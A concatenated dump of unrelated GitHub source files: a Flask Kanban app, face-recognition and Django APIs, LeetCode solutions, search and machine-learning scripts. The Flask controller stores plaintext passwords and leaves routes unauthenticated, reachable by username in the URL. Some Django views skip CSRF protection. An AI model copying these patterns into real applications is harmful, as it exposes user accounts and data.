lbsp_pixel_for_gpu(img,abs_X,abs_Y)\n\t'''\n\tstartX, startY = cuda.grid(2)\n\tgridX = cuda.gridDim.x * cuda.blockDim.x;\n\tgridY = cuda.gridDim.y * cuda.blockDim.y;\n\tfor x in range(startX, width, gridX):\n\t\tfor y in range(startY, height, gridY): \n\t#x,y = cuda.grid(2)\n\t#if x < width and y < height:\n\t\t\tvalues[y,x] = lbsp_pixel_for_gpu(img,x,y)\n\t\t\t#values[y,x] = lbsp_pixel(img,x,y)\n\t'''\n\n#@timer\ndef compute_lbsp_with_GPU(img,values,blockdim,griddim):\n\tlbsp_gpu_kernel[griddim, blockdim](img,values)\n\n\n\ndef compute_lbsp_gpu(img,values):\n\tlbsp_gpu_kernel[GRIDDIM, BLOCKDIM](img,values)\n\n\t\n\n\"\"\"\nif __name__ == '__main__':\n\n\tnp.random.seed(0)\n\timage = np.random.randint(1,10,(10,10))\n\tlbsp_values = np.zeros(image.shape,dtype=np.uint16)\n\n\t#compute_lbsp_without_GPU(image,lbsp_values)\n\tcompute_lbsp_with_GPU(image,lbsp_values)\n\"\"\"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\"\"\"\n\tdef compute_one_pixel_lbsp_value(img,coor_x,coor_y,tr = Tr):\n\t\twidth, height = img.shape\n\t\tit = [x for x in list(range(-2,3)) ]\n\t\tneighbor_coordinates = [(x[0]+coor_x,x[1]+coor_y) for x in itertools.product(it,it) \n\t\t\t\t\t\t\t\tif abs(x[0]*x[1])!=2 and (abs(x[0])+abs(x[1])!=0)]\n\n\t\tneighbor_values = [img[coordinate] if coordinate[0]>=0 and coordinate[1]>=0 \n\t\t\t\t\t\t\tand coordinate[0]=0 and coordinate[1]>=0 and coordinate[0]\")\ndef home(username):\n user = User.query.filter_by(Username=username).first()\n lists = List.query.filter_by(UserID=user.UserID).all()\n if lists==[]:\n return render_template(\"nolists.html\",username = user.Username)\n else:\n c_cards = Card.query.filter_by(UserID=user.UserID, Complete=\"1\")\n d_cards = Card.query.filter_by(UserID=user.UserID, Complete=\"0\")\n return render_template(\"home.html\",username = user.Username, lists = lists, dcards = d_cards, ccards = c_cards)\n\n@app.route(\"/signup\", methods = ['GET','POST'])\ndef signup():\n if request.method == 'GET':\n return render_template(\"signup.html\")\n elif request.method == 'POST':\n \tif '@' not in request.form['email']:\n \t\treturn render_template('invalidentries.html')\n \ttemp = User.query.filter_by(Username = request.form['username']).first()\n \tif temp == None:\n \t\tnewuser = User(Username = request.form['username'], EmailID = request.form['email'], Password = request.form['password'])\n \t\tdb.session.add(newuser)\n \t\tdb.session.commit()\n \t\treturn redirect(url_for(\"home\", username = request.form['username']))\n \telse:\n \t\treturn render_template(\"userexists.html\")\n\n@app.route(\"/login\", methods = ['GET','POST'])\ndef login():\n if request.method == 'GET':\n return render_template(\"login.html\")\n elif request.method == 'POST':\n temp = User.query.filter_by(Username = request.form['username'], Password = request.form['password']).first()\n if temp==None:\n return render_template(\"invalidentries.html\")\n else:\n return redirect(url_for(\"home\",username=request.form['username']))\n\n@app.route(\"//addlist\", methods = ['GET','POST'])\ndef addlist(username):\n if request.method == 'GET':\n user = User.query.filter_by(Username=username).first()\n lists = List.query.filter_by(UserID=user.UserID).all()\n if len(lists)==5:\n return render_template(\"maxlists.html\",username=username)\n return render_template(\"addlist.html\",username=username)\n elif request.method == 'POST':\n user = User.query.filter_by(Username=username).first()\n list = List(UserID=user.UserID, Name=request.form['name'], Description=request.form['desc'], Created_time=str(date.today().strftime('%d/%m/%Y')))\n db.session.add(list)\n db.session.commit()\n return redirect(url_for(\"home\",username = username))\n\n@app.route(\"//editlist/\", methods=['GET','POST'])\ndef editlist(username,listid):\n list = List.query.filter_by(ListID=listid).first()\n if request.method == 'GET':\n return render_template('editlist.html', username=username, list=list)\n elif request.method == 'POST':\n list.Name = request.form['name']\n list.Description = request.form['desc']\n db.session.commit()\n return redirect(url_for('home',username=username))\n\n@app.route(\"//deletelist/\")\ndef deletelist(username,listid):\n if request.method == 'GET':\n list = List.query.filter_by(ListID = listid).first()\n cards = Card.query.filter_by(ListID=listid).all()\n print(cards)\n if cards == []:\n \treturn render_template('deletelist3.html', username=username, listid=listid, listname=list.Name)\n else:\n \treturn render_template('deletelist1.html',username=username, listid=listid,listname=list.Name)\n\n@app.route(\"//deletelistandcards/\")\ndef deletelistandcards(username,listid):\n cards = Card.query.filter_by(ListID = listid).all()\n for card in cards:\n db.session.delete(card)\n print(card)\n list = List.query.filter_by(ListID = listid).first()\n db.session.delete(list)\n print(\"deleted successfully\")\n db.session.commit()\n return redirect(url_for('home',username=username))\n\n@app.route(\"//movecards/\", methods=['GET','POST'])\ndef movecards(username, listid):\n cards = Card.query.filter_by(ListID = listid).all()\n list = List.query.filter_by(ListID = listid).first()\n if request.method == 'GET':\n user = User.query.filter_by(Username = username).first()\n lists = List.query.filter_by(UserID = user.UserID).all()\n lists.remove(list)\n return render_template(\"deletelist2.html\",username=username, listid = listid, cards = cards, lists = lists)\n elif request.method =='POST':\n print(\"here\")\n for card in cards:\n card.ListID = request.form[str(card.CardID)]\n db.session.delete(list)\n print(\"done\")\n db.session.commit()\n return redirect(url_for('home',username=username))\n\n@app.route(\"///addcard\", methods=['GET','POST'])\ndef addcard(username, listid):\n user = User.query.filter_by(Username=username).first()\n if request.method == 'GET':\n lists = List.query.filter_by(UserID=user.UserID).all()\n list = List.query.filter_by(ListID=listid).first()\n lists.remove(list)\n lists.insert(0,list)\n curr_date = str(date.today())\n return render_template('addcard.html', username=username, lists=lists, curr_date=curr_date)\n elif request.method == 'POST':\n time = str(date.today().strftime('%d/%m/%Y'))\n if request.form['complete'] == \"1\":\n ctime = time\n elif request.form['complete'] == \"0\":\n ctime = None\n x = (datetime.strptime(request.form['deadline'], '%Y-%m-%d').date()).strftime('%d/%m/%Y')\n newcard = Card(ListID = request.form['listid'], UserID = user.UserID, Title = request.form['title'], Content = request.form['content'], Deadline = x, Complete = request.form['complete'], Created_time = time, Last_updated_time = time, Completed_time = ctime)\n db.session.add(newcard)\n db.session.commit()\n return redirect(url_for('home',username=username))\n\n@app.route(\"//editcard/\", methods=['GET','POST'])\ndef editcard(username,cardid):\n user = User.query.filter_by(Username=username).first()\n card = Card.query.filter_by(CardID = cardid).first()\n if request.method == 'GET':\n lists = List.query.filter_by(UserID=user.UserID).all()\n list = List.query.filter_by(ListID=card.ListID).first()\n lists.remove(list)\n lists.insert(0,list)\n curr_date = str(date.today())\n val = 0\n if card.Complete == 1:\n val = 1\n \n x = (datetime.strptime(card.Deadline, '%d/%m/%Y').date()).strftime('%Y-%m-%d')\n return render_template('editcard.html',username=username, card=card, lists=lists, val=val, curr_date = curr_date, ddate = x)\n elif request.method == 'POST':\n time = str(date.today().strftime('%d/%m/%Y'))\n ctime = None\n if request.form['complete'] == \"1\":\n ctime = time\n card.ListID = int(request.form['listid'])\n card.Title = request.form['title']\n card.Content = request.form['content']\n card.Deadline = (datetime.strptime(request.form['deadline'], '%Y-%m-%d').date()).strftime('%d/%m/%Y')\n card.Complete = str(request.form['complete'])\n card.Last_updated_time = time\n card.Completed_time = ctime\n db.session.commit()\n return redirect(url_for('home',username=username))\n\n@app.route(\"//deletecard/\", methods=['GET','POST'])\ndef deletecard(username,cardid):\n card = Card.query.filter_by(CardID=cardid).first()\n if request.method == 'GET':\n return render_template('deletecard.html',username=username, card=card)\n elif request.method == 'POST':\n db.session.delete(card)\n db.session.commit()\n return redirect(url_for('home',username=username))\n\n@app.route(\"//summary\")\ndef summary(username):\n user = User.query.filter_by(Username = username).first()\n lists = List.query.filter_by(UserID = user.UserID).all()\n count = {}\n for list in lists:\n l = {}\n total_cards = Card.query.filter_by(ListID = list.ListID).all()\n l['total'] = len(total_cards)\n completed_cards = Card.query.filter_by(ListID = list.ListID, Complete = '1').all()\n l['c'] = len(completed_cards)\n not_completed_cards = Card.query.filter_by(ListID = list.ListID, Complete = '0', ).all()\n curr_date = str(date.today())\n l['pd'] = 0\n l['d'] = 0\n for card in not_completed_cards:\n \tx = str(datetime.strptime(card.Deadline, '%d/%m/%Y').date())\n \t\tif curr_date > x:\n \t\t\tl['pd']+=1\n \t\telse:\n \t\t\tl['d']+=1\n \tcount[list.ListID] = l\n\n dates = []\n completed_card_count = []\n start_date = datetime.strptime(list.Created_time, '%d/%m/%Y').date()\n end_date = datetime.strptime(str(date.today().strftime('%d/%m/%Y')), '%d/%m/%Y').date()\n for x in daterange(start_date, end_date):\n x = x.strftime('%d/%m/%Y')\n dates.append(x[:5])\n cc = Card.query.filter_by(ListID=list.ListID, Completed_time = x).all()\n completed_card_count.append(len(cc))\n\n fig = plt.figure()\n fig.add_subplot(111)\n plt.bar(dates, completed_card_count)\n plt.savefig(\"static/\"+str(list.ListID)+\"_graph.png\")\n \n return render_template(\"summary.html\",username=username, lists=lists, count=count)\n\n\n\n@app.route(\"//overallsummary\")\ndef overallsummary(username):\n user = User.query.filter_by(Username = username).first()\n lists = List.query.filter_by(UserID = user.UserID).all()\n start_date=(datetime.strptime(lists[0].Created_time, '%d/%m/%Y').date())\n \n for list in lists:\n \tx = (datetime.strptime(list.Created_time, '%d/%m/%Y').date())\n \tif x < start_date:\n \t\tstart_date = x\n start_date = start_date.strftime('%d/%m/%Y')\n\n dates = []\n completed_card_count = []\n start_date = datetime.strptime(start_date, '%d/%m/%Y').date()\n end_date = datetime.strptime(str(date.today().strftime('%d/%m/%Y')), '%d/%m/%Y').date()\n for x in daterange(start_date, end_date):\n x = x.strftime('%d/%m/%Y')\n dates.append(x[:5])\n cc = Card.query.filter_by(UserID=user.UserID, Completed_time = x).all()\n completed_card_count.append(len(cc))\n\n fig = plt.figure()\n fig.add_subplot(111)\n plt.bar(dates, completed_card_count)\n plt.savefig(\"static/overall.png\")\n \n return render_template(\"overallsummary.html\",username=username)\n\n@app.route(\"/account/\")\ndef account(username):\n\tuser = User.query.filter_by(Username = username).first()\n\treturn render_template(\"account.html\",username=username, user=user)\n\n@app.route(\"/editaccount/\", methods=['GET','POST'])\ndef editaccount(username):\n\tuser = User.query.filter_by(Username = username).first()\n\tif request.method == 'GET':\n\t\treturn render_template(\"editaccount.html\",username=username, user=user)\n\telif request.method == 'POST':\n\t\tif '@' not in request.form['email']:\n\t\t\treturn render_template('invaliddetails.html', username=username)\n\t\tuser.EmailID = request.form['email']\n\t\tuser.Password = request.form['password']\n\t\tdb.session.commit()\n\t\treturn redirect(url_for('account',username=username))\n\n@app.route(\"/deleteaccount/\", methods=['GET','POST'])\ndef deleteaccount(username):\n\tif request.method == 'GET':\n\t\treturn render_template(\"deleteaccount.html\",username=username)\n\telif request.method == 'POST':\n\t\tuser = User.query.filter_by(Username = username).first()\n\t\tdb.session.delete(user)\n\t\tdb.session.commit()\n\t\treturn redirect(url_for('main'))\n\n@app.route(\"/logout\")\ndef logout():\n return redirect(url_for('main'))\n\n\n","repo_name":"Donajose5/Kanban-Board-Application","sub_path":"application/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":12143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74028520108","text":"# -*- coding: utf-8 -*-\n\n# 短字符串在长字符串中出现的次数\n# 第一种解法()\n# 利用循环遍历长字符串,再判断遍历出的字符是否在短字符中\n# 如果在则计数加 1,最后统计处总出现次数\nclass Solution(object):\n def numJewelsInStones(self, J, S):\n count = 0\n ListJ = list(J)\n for i in S:\n if i in ListJ:\n count += 1\n return count\n\nsolution = Solution()\nprint(solution.numJewelsInStones('adfKJNFi', 'aoifejfkmaklnmvklksdjfKLJKJDSLKJLjkl'))\n\n\n# 第二种解法\n# \nclass Solution2(object):\n def numJewelsInStones2(self, J, S):\n for i in (s in J for s in S):\n print(i)\n return sum(s in J for s in S)\n\nsolution2 = Solution2()\nprint(solution2.numJewelsInStones2('adfKJNFi', 'aoiejfkmaklnmvklksdjfKLJKJDSLKJLjkl'))\n\n\n# 第三种解法\n# 利用 Python Set 里 x in s 最优时间复杂度为 O(1)\n# \nclass Solution3(object):\n def numJewelsInStones3(self, J, S):\n setJ = set(J)\n return sum(s in setJ for s in S)\n\n# 第四种解法\n# 利用列表生成式,遍历长字符串,判断遍历出的字符是否在短字符中\n# 将返回的字符生成一个列表\nclass Solution4(object):\n def numJewelsInStones4(self, J, S):\n print(type([stone for stone in S if stone in J]))\n return len([stone for stone in S if stone in J])\nsolution4 = Solution4()\nprint(solution4.numJewelsInStones4('adfKJNFi', 'aoiejfkmaklnmvklksdjfKLJKJDSLKJLjkl'))\n\n","repo_name":"Dxigui/Myleetcode","sub_path":"Easy/jewel_and_stone.py","file_name":"jewel_and_stone.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"34769386000","text":"import web\n#from models import login\nimport models.CreateStudent\nimport models.GetStudent\n\nimport cv2\nimport os\nimport numpy as np\nimport faceRecognition as fr\nfrom PIL import Image\nfrom PIL.ExifTags import TAGS\n\nurls = (\n '/student/create', 'Create',\n '/student/get', 'Get'\n)\napp = web.application(urls, globals())\n\n\nclass Create:\n def POST(self):\n data = web.input()\n print(data)\n student_model = models.CreateStudent.create()\n student_model.insert_student(data)\n return data\n\nclass Get:\n def POST(self):\n data = web.input()\n fp=data.image\n print(data.image)\n print(type(data.image))\n f=open(\"input.jpg\",\"wb\")\n f.write(data.image)\n f.close()\n\n test_img=cv2.imread(\"input.jpg\")\n print(test_img)\n\n faces_detected,gray_img=fr.recognizer.faceDetection(test_img)\n print(\"faces_detected:\",faces_detected)\n print(\"faces_detected:\",type(faces_detected) is tuple)\n if (type(faces_detected) is tuple):\n return {'error': 'Face not detected'}\n face_recognizer=cv2.face.LBPHFaceRecognizer_create()\n face_recognizer.read('trainingData2.yml')\n # name = {0 : \"'Priyanka'\",1 : \"'Kangana'\",2:\"'Akan'\",3:\"'Kayode'\"}\n # name = {0 : \"'Jackie'\",1 : \"'Priyanka'\",2:\"'Kayode'\"}\n name = {0 : \"Jackie\",1 : \"Priyanka\",2:\"Kayode\"}\n\n for face in faces_detected:\n (x,y,w,h)=face\n roi_gray=gray_img[y:y+h,x:x+w]\n print('w is: ',w,'h is: ',h)\n cv2.imwrite('face.jpg', roi_gray)\n cv2.imwrite('roi_gray.jpg', roi_gray)\n label,confidence=face_recognizer.predict(roi_gray)\n print(\"confidence:\",confidence)\n print(\"label:\",label)\n predicted_name=name[label]\n if(confidence>38):\n return {'error': 'Student is not verified'}\n fr.recognizer.resultImage(test_img,face,predicted_name)\n\n student_model = models.GetStudent.get()\n student = student_model.get_student(predicted_name)\n if student:\n return student\n print(\"error!\")\n return \"error\"\n\n\nif __name__ == \"__main__\":\n app.run()","repo_name":"Kaykeks1/FacialRecognition-API","sub_path":"controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":2217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38805427095","text":"import sys\nimport time\nimport os.path\n\ndef bruteForce(file, pattern):\n matches = []\n #for each line\n for index, line in enumerate(file):\n #compare the line with the pattern\n for i in range(len(line)-len(pattern)):\n for j in range(len(pattern)):\n #if it's different then we move to the next character\n if line[i+j] != pattern[j]:\n break \n if j == (len(pattern)-1):\n print('Pattern found: '+ str([index, i]))\n matches.append([index, i])\n return matches \n\ndef main():\n\n fileName = sys.argv[1]\n file=open(fileName, \"r\")\n\n pattern = sys.argv[2]\n\n time_start = time.process_time()\n pos=bruteForce(file, pattern)\n time_elapsed = time.process_time()\n #If file exists we append the result, if not we create it and write the measure of time\n if os.path.exists('measures.txt'):\n f= open(\"measures.txt\",\"a+\")\n else:\n f= open(\"measures.txt\",\"w+\")\n\n f.write(\"Algorithm: Naive \\t Time: \"+str(time_elapsed)+\" secs \\t Pattern: \" + str(pattern)+\"\\n\")\n\nif __name__ == \"__main__\":\n main()\n ","repo_name":"nowrie141/MATD","sub_path":"week2/bruteForce.py","file_name":"bruteForce.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34487353015","text":"#!/usr/bin/env python\n\"\"\"A basic ZMQ echo server with zmq.eventloop.future\"\"\"\n\nfrom tornado import ioloop\n\nimport zmq\nfrom zmq.eventloop.future import Context\n\n\nasync def echo(sock):\n while True:\n msg = await sock.recv_multipart()\n await sock.send_multipart(msg)\n\n\nctx = Context.instance()\ns = ctx.socket(zmq.ROUTER)\ns.bind('tcp://127.0.0.1:5555')\n\nloop = ioloop.IOLoop.current()\nloop.spawn_callback(echo, s)\nloop.start()\n","repo_name":"zeromq/pyzmq","sub_path":"examples/eventloop/echofuture.py","file_name":"echofuture.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":3466,"dataset":"github-code","pt":"37"} +{"seq_id":"19258905241","text":"import torch\nimport torch.nn as nn\n\nfrom smolai.callbacks import Callback, before\n\n\ndef init_weights(m: nn.Module):\n if isinstance(m, (nn.Conv1d, nn.Conv2d, nn.Conv3d, nn.Linear)):\n torch.nn.init.kaiming_normal_(m.weight)\n\n\nclass InitWeights(Callback):\n \"\"\"Use Kaiming initialization for all layers in the model and scale\n the input apropriately.\n\n See: https://colab.research.google.com/drive/1J1E5a_WtZ2tJt-9MRASxWR_lHqIbDb1G?usp=sharing\"\"\"\n\n @before\n def batch(self, context):\n X, y = context.batch\n X = (X - X.mean()) / X.std()\n context.batch = (X, y)\n\n @before\n def fit(self, context):\n context.model.apply(init_weights)\n","repo_name":"jeremyadamsfisher/smol-ai","sub_path":"smolai/callbacks/weights.py","file_name":"weights.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31666234349","text":"from semantic_search import SemanticSearch\nfrom lexical_search import LexicalSearch\nimport pandas as pd\n\nimport pandas as pd\n\ndef reciprocal_rank_fusion(semantic_rank, lexical_rank, k):\n\n for rank, (key, value) in enumerate(semantic_rank.items()):\n score = 1 / (rank + 60)\n semantic_rank[key] = {\"value\": value, \"score\": score}\n\n for rank, (key, value) in enumerate(lexical_rank.items()):\n score = 1 / (rank + 60)\n lexical_rank[key] = {\"value\": value, \"score\": score}\n\n summed_scores_dict = {}\n\n for key in set(semantic_rank.keys()) | set(lexical_rank.keys()):\n score1 = semantic_rank.get(key, {'score': 0})['score']\n score2 = lexical_rank.get(key, {'score': 0})['score']\n\n summed_score = score1 + score2\n\n summed_scores_dict[key] = {'score': summed_score}\n\n reciprocal_rank_fusion = dict(sorted(summed_scores_dict.items(), key=lambda item: item[1]['score'], reverse=True))\n\n return reciprocal_rank_fusion\n\ndf = pd.read_csv('data_halodoc_ordered.csv')\ncorpus = df['uses'].to_list()\nquery = \"susu untuk ibu hamil\"\nlexical_model = LexicalSearch()\nlexical_rank = lexical_model.rank(corpus, query)\nsemantic_model = SemanticSearch()\nsemantic_model.load_pretrained()\nsemantic_rank = semantic_model.rank(corpus, query)\nfusion_rank = reciprocal_rank_fusion(semantic_rank, lexical_rank, 60)\n\ncorpus_id = list(fusion_rank.keys())\nfor id in corpus_id[:10]:\n print(corpus[id])\n print(\"=====================================================\")\n\n","repo_name":"projectwilsen/ProjectRekomendasiObat","sub_path":"code/hybrid_search.py","file_name":"hybrid_search.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8508949798","text":"from django.shortcuts import render,redirect,get_object_or_404\r\nfrom .models import Arte\r\nfrom .forms import ContactoForm,ArteForm,CustomUserCreationForm\r\nfrom django.contrib import messages\r\nfrom django.contrib.auth import authenticate , login\r\nfrom django.contrib.auth.decorators import login_required,permission_required\r\nfrom rest_framework import status\r\nfrom rest_framework.decorators import api_view,permission_classes\r\nfrom rest_framework.response import Response\r\nfrom rest_framework.parsers import JSONParser\r\nfrom django.views.decorators.csrf import csrf_exempt \r\nfrom rest_framework import viewsets\r\nfrom .serializers import ArteSerializer\r\n\r\nfrom rest_framework.authentication import TokenAuthentication\r\nfrom rest_framework.permissions import IsAuthenticated\r\n\r\n\r\n\r\n\r\n# Create your views here.\r\n\r\n\r\n\r\ndef home(request):\r\n artes = Arte.objects.all()\r\n data = {\r\n 'artes': artes\r\n }\r\n return render(request,'app/home.html',data)\r\n\r\ndef contacto(request):\r\n data = {\r\n 'form': ContactoForm()\r\n }\r\n\r\n if request.method == 'POST':\r\n formulario = ContactoForm(data=request.POST)\r\n if formulario.is_valid():\r\n formulario.save()\r\n data[\"mensaje\"] = \"enviado correctamente\"\r\n else:\r\n data[\"form\"] = formulario\r\n return render (request,'app/contacto.html',data)\r\n\r\ndef main_pinturas(request):\r\n return render (request,'app/main_pinturas.html')\r\n\r\ndef Inf_imagen(request):\r\n return render (request,'app/Inf_imagen.html')\r\n\r\ndef Inf_imagen2(request):\r\n return render (request,'app/Inf_imagen2.html')\r\n\r\ndef Inf_imagen3(request):\r\n return render (request,'app/Inf_imagen3.html')\r\n\r\ndef Inf_imagen4(request):\r\n return render (request,'app/Inf_imagen4.html')\r\n\r\ndef main_esculturas(request):\r\n return render (request,'app/main_esculturas.html')\r\n\r\ndef main_orfebreria(request):\r\n return render (request,'app/main_orfebreria.html')\r\n\r\ndef orfebreria1(request):\r\n return render(request,'app/arteshtmls/orfebreriashtml/orfebreria1.html')\r\n\r\ndef orfebreria2(request):\r\n return render(request,'app/arteshtmls/orfebreriashtml/orfebreria2.html')\r\n\r\ndef orfebreria3(request):\r\n return render(request,'app/arteshtmls/orfebreriashtml/orfebreria3.html')\r\n \r\ndef orfebreria4(request):\r\n return render(request,'app/arteshtmls/orfebreriashtml/orfebreria4.html')\r\n \r\ndef escultura1(request):\r\n return render (request,'app/arteshtmls/esculturashtmls/escultura1.html')\r\n\r\ndef escultura2(request):\r\n return render (request,'app/arteshtmls/esculturashtmls/escultura2.html')\r\n\r\ndef ConoceMas(request):\r\n return render (request,'app/ConoceMas.html')\r\n\r\n\r\n@permission_required('core.add_arte')\r\n@login_required\r\ndef agregar_arte(request):\r\n data = {\r\n 'form':ArteForm()\r\n }\r\n if request.method == 'POST':\r\n formulario = ArteForm(data=request.POST)\r\n if formulario.is_valid():\r\n formulario.save()\r\n data[\"mensaje\"] = \"PRODUCTO AGREGADO CORRECTAMENTE\"\r\n else:\r\n data[\"form\"] = formulario\r\n return render(request,'app/artes/agregar.html',data)\r\n\r\n@permission_required('core.view_arte')\r\ndef listar_artes(request):\r\n artes = Arte.objects.all()\r\n\r\n data = {\r\n 'artes':artes\r\n }\r\n return render(request,'app/artes/listar.html',data)\r\n\r\n@permission_required('core.change_arte')\r\ndef mod_arte(request,id):\r\n arte = Arte.objects.get(idprod=id)\r\n data = {\r\n 'form': ArteForm(instance=Arte)\r\n }\r\n if request.method=='POST':\r\n formulario=ArteForm(data=request.POST, instance=arte)\r\n if formulario.is_valid():\r\n formulario.save()\r\n messages.success(request,\"MODIFICADO CORRECTAMENTE\")\r\n return redirect(to=\"listar_artes\")\r\n data[\"form\"]=formulario\r\n return render(request,'app/artes/mod.html',data)\r\n\r\n@permission_required('core.delete_arte')\r\ndef del_arte(request, id):\r\n arte = Arte.objects.get(idprod=id)\r\n arte.delete()\r\n messages.success(request,\"ELIMINADO CORRECTAMENTE\")\r\n return redirect(to=\"listar_artes\")\r\n\r\ndef registro(request):\r\n data = {\r\n 'form':CustomUserCreationForm\r\n }\r\n if request.method == 'POST':\r\n formulario = CustomUserCreationForm(data=request.POST)\r\n if formulario.is_valid():\r\n formulario.save()\r\n User = authenticate(username=formulario.cleaned_data[\"username\"],password=formulario.cleaned_data[\"password1\"])\r\n login(request,User)\r\n messages.success(request,\"REGISTRADO CORRECTAMENTE\")\r\n return redirect(to=home)\r\n data[\"form\"]\r\n return render(request,'registration/registro.html',data)\r\n\r\n@csrf_exempt\r\n@api_view(['GET','POST'])\r\n@permission_classes((IsAuthenticated,))\r\ndef lista_artes(request):\r\n if request.method == 'GET':\r\n arte = Arte.objects.all()\r\n serializer = ArteSerializer(arte,many=True)\r\n return Response(serializer.data)\r\n elif request.method == 'POST':\r\n data = JSONParser().parse(request)\r\n serializer = ArteSerializer(data=data)\r\n if serializer.is_valid():\r\n serializer.save()\r\n return Response(serializer.data, status=status.HTTP_201_CREATED)\r\n else:\r\n return Response(serializer.errors,status==status.HTTP_400_BAD_REQUEST)\r\n\r\n@api_view(['GET','PUT','DELETE'])\r\n@permission_classes((IsAuthenticated,))\r\ndef detalle_arte(request,id):\r\n try:\r\n arte= Arte.objects.get(idprod=id)\r\n except Arte.DoesNotExist:\r\n return Response(status=status.HTTP_404_NOT_FOUND)\r\n if request.method == 'GET':\r\n serializer = ArteSerializer(arte)\r\n return Response(serializer.data)\r\n if request.method == 'PUT':\r\n data = JSONParser().parse(request)\r\n serializer = ArteSerializer(arte,data=data)\r\n if serializer.is_valid():\r\n serializer.save()\r\n return Response(serializer.data)\r\n else:\r\n return Response(serializer.errors,status=status.HTTP_400_BAD_REQUEST)\r\n elif request.method == 'DELETE':\r\n arte.delete()\r\n return Response(status=status.HTTP_204_NO_CONTENT)\r\n\r\n@csrf_exempt\r\n@api_view(['GET','POST'])\r\n@permission_classes((IsAuthenticated,))\r\ndef lista_artes(request):\r\n if request.method == 'GET':\r\n arte = Arte.objects.all()\r\n serializer = ArteSerializer(arte,many=True)\r\n return Response(serializer.data)\r\n elif request.method == 'POST':\r\n data = JSONParser().parse(request)\r\n serializer = ArteSerializer(data=data)\r\n if serializer.is_valid():\r\n serializer.save()\r\n return Response(serializer.data, status=status.HTTP_201_CREATED)\r\n else:\r\n return Response(serializer.errors,status==status.HTTP_400_BAD_REQUEST)\r\n\r\n@api_view(['GET','PUT','DELETE'])\r\n@permission_classes((IsAuthenticated,))\r\ndef detalle_arte(request,id):\r\n try:\r\n arte= Arte.objects.get(idprod=id)\r\n except Arte.DoesNotExist:\r\n return Response(status=status.HTTP_404_NOT_FOUND)\r\n if request.method == 'GET':\r\n serializer = ArteSerializer(arte)\r\n return Response(serializer.data)\r\n if request.method == 'PUT':\r\n data = JSONParser().parse(request)\r\n serializer = ArteSerializer(arte,data=data)\r\n if serializer.is_valid():\r\n serializer.save()\r\n return Response(serializer.data)\r\n else:\r\n return Response(serializer.errors,status=status.HTTP_400_BAD_REQUEST)\r\n elif request.method == 'DELETE':\r\n arte.delete()\r\n return Response(status=status.HTTP_204_NO_CONTENT)","repo_name":"IgnacioSIUU/Grupo-Cero","sub_path":"GrupoCero/GrupoCero/core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20912663445","text":"## LOGISTIC REGRESSION\n## REVIEW CLASSIFICATION BASED ON WORDS\n\nimport numpy as np\nfrom sklearn.feature_extraction.text import CountVectorizer\n \nvectorizer = CountVectorizer()\n\n## Fit the bag-of-words model\nbag = vectorizer.fit_transform(women_clothes_reviews['Final Text'])\n\n# Creating training data set from bag-of-words and dummy label\nX = bag.toarray()\ny = np.array(women_clothes_reviews['Recommended IND'])\n \nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn import metrics\n\n# Create training and test split\nX_train, X_test, y_train, y_test = train_test_split(X, y)\n\n# Create an instance of LogisticRegression classifier\nlr = LogisticRegression(C=100.0, random_state=1, solver='lbfgs', multi_class='ovr')\n\n# Fit the model\nmodel=lr.fit(X_train, y_train)\n\n# Create the predictions\ny_predict = model.predict(X_test)\ny_predict_prob = model.predict_proba(X_test)\n \n# Use metrics.accuracy_score to measure the score\nprint(\"LogisticRegression Accuracy %.3f\" %metrics.accuracy_score(y_test, y_predict))\n\n#################################\nfrom sklearn.metrics import confusion_matrix\nconfusion_matrix(y_test,y_predict)\n\n## Self-defined threshold\ny_predict_self = [1 if prob > 0.102232 else 0 for prob in y_predict_prob[:,1]]\n# Model evaluation on accuracy\nconfusion_matrix(y_test,y_predict_self)\n\n\nfrom sklearn.metrics import roc_curve\nfrom matplotlib import pyplot\n\nfpr, tpr, thresholds = roc_curve(y_test, y_predict_prob[:,1])\n# plot the roc curve for the model\npyplot.plot([0,1], [0,1], linestyle='--', label='No Skill')\npyplot.plot(fpr, tpr, marker='.', label='Logistic')\n# axis labels\npyplot.xlabel('False Positive Rate')\npyplot.ylabel('True Positive Rate')\npyplot.legend()\n# show the plot\npyplot.show()\n\n## Optimal THRESHOLD BASED ON F1-SCORE \nfrom numpy import argmax\nfrom sklearn.metrics import precision_recall_curve\n# calculate roc curves\nprecision, recall, thresholds = precision_recall_curve(y_test, y_predict_prob[:,1])\n# convert to f score\nfscore = (2 * precision * recall) / (precision + recall)\n# locate the index of the largest f score\nix = argmax(fscore)\nprint('Best Threshold=%f, F-Score=%.3f' % (thresholds[ix], fscore[ix]))\n","repo_name":"ProfNascimento/LinearREG","sub_path":"NLP-LOGIST_REG.py","file_name":"NLP-LOGIST_REG.py","file_ext":"py","file_size_in_byte":2210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"75092381226","text":"\nimport torch\nimport torch.nn as nn\n\nimport Prox as px\n\nfrom importlib import reload\nreload(px)\n\n\nclass DRSolver(nn.Module):\n \"\"\"\n Implementation of Douglas Rachford (DR) Iterations for corrections of solution estimates for problems of the form\n min f(x) \n subject to:\n F_ineq(x) <= 0\n F_eq(x)= 0\n\n The problem is reformulated as\n\n min f(x)\n subject to:\n F(x,s) = 0\n s>=0\n\n for slack variables s, and F(x,s) 